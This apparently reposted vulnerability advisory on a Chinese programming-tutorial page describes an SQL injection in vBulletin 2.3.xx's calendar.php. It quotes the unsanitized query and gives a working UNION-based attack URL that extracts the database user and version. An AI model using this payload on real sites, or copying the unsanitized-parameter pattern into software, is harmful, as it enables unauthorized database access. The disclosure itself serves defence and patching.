当前位置: 首页 > 图文教程 > 网络编程 > PHP > vBulletin Forum 2.3.xx SQL Injection

PHP
为php4加入动态flash文件的生成的支持
一个oracle+PHP的查询的例子
第十节 抽象方法和抽象类 [10]
第九节 绑定 [9]
第八节 访问方式 [8]
第六节 访问属性和方法 [6]
第五节 克隆 [5]
Zend引擎的发展 [15]
第三节 定义一个类 [3]
第二节 对象模型 [2]
Classes and Objects in PHP5-面向对象编程 [1]
PHP5 安装方法
第四节 构造函数和析构函数 [4]
php中数据的批量导入(csv文件)
一个ftp类(ini.php)
example1.php
VML绘图板②脚本--VMLgraph.js、XMLtool.js
如何获得PHP相关资料
PHP 和 COM
编译问题

PHP 中的 vBulletin Forum 2.3.xx SQL Injection


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 57 ::
收藏到网摘: n/a


vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.